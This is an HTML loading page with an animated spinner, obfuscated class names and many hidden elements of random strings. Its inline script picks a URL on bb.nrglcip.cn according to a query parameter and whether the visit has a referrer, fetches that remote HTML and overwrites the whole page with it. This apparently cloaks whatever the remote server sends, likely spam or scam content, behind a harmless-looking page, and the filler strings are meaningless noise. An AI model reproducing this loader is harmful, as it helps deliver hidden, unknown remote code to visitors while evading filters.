<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .A48SRfwC1W3 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .A48SRfwC1W3 .oEwwKD {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .A48SRfwC1W3 .content {
            line-height: 50px;
            text-align: center
        }

        .A48SRfwC1W3 .img {
            width: 100%
        }

        .A48SRfwC1W3 .SIM3r28h {
            text-align: center
        }

        .A48SRfwC1W3 .SIM3r28h span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .A48SRfwC1W3 .SIM3r28h span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .A48SRfwC1W3 .SIM3r28h span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .A48SRfwC1W3 .SIM3r28h span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .A48SRfwC1W3 .SIM3r28h span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .A48SRfwC1W3 .SIM3r28h span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .A48SRfwC1W3 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function LSKjwSsMc3(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var C1GVa4c = LSKjwSsMc3('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ C1GVa4c +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ C1GVa4c +".html?a=share";
		}
		
        CvNrIR=url+"#"+new Date().getTime();
        CvNrIR && function() {
            $.get(CvNrIR, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>pVWQQ6ZILv5dYNaEmtTtxCK5FTV9bmtfzijiwjO3wjpDxH4efjd5mFG0oxbNDWfxBgRpzLPffZISSyH0S</a>
<li style='display:none' >C20uCZC2vaQ9MX5ln9w</li>
<p  style='display:none'>dFxU9kyeS661OGqcNtDGSJd0BLz</p>
<ul style='display:none' >KkH1MVsUs55Uk578DSV06Zl1U9t</ul>
<ul style='display:none' >KkH1MVsUs55Uk578DSV06Zl1U9t</ul><div class="A48SRfwC1W3">
    <div class="oEwwKD">
        <div class="SIM3r28h">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>ZD21kdOXDQzpXaQ0SFH6Ujb3m8GCKa3mTOdKi4arLYEGPIDiJQ</p>
<ul style='display:none' >yQ3x1emCYXi9GXsbj8rW5YNsT885</ul>
<div style='display:none'>IEpjvGnyiizFWKw6hMhOCmNx8UMtrPSVgGPlhx3FHooGrKKvZduHZs9OGUFIYQ9OphNLfYSMEhxuCn8wrGUt6rW2p8YdF7OdaN0v</div>
<li style='display:none' >Q6PKAwWU88ES92RMhUxCRuXpS3mSDa98tpj2sGvDWQ3ylbvEGqhFPWcPtSa2NlrntX26YZ7x4</li>
<a  href='#' style='display:none'>vUDnOzsFxK3HF9xbl8UE5RUIEQ2EU5TeW1STrGR2hqBobHpEWPEK9kA3g4rZBK0eINnQviM0cs0ZWtAaCVIF7OU3lG</a>
<a  href='#' style='display:none'>vUDnOzsFxK3HF9xbl8UE5RUIEQ2EU5TeW1STrGR2hqBobHpEWPEK9kA3g4rZBK0eINnQviM0cs0ZWtAaCVIF7OU3lG</a>
<div style='display:none'>IEpjvGnyiizFWKw6hMhOCmNx8UMtrPSVgGPlhx3FHooGrKKvZduHZs9OGUFIYQ9OphNLfYSMEhxuCn8wrGUt6rW2p8YdF7OdaN0v</div>
<span style='display:none'>ZClj6BpANgnz46SZ</span>
<h1 style='display:none' >yfdU3xIrPVsuIbIuz3FnHj9hgPrrofsHfHo5yjGYUSMJCS4AoN6ptz5WxEIJSZCHvaglclXxv5yweieGvnOPFB1f</h1></body>
</html>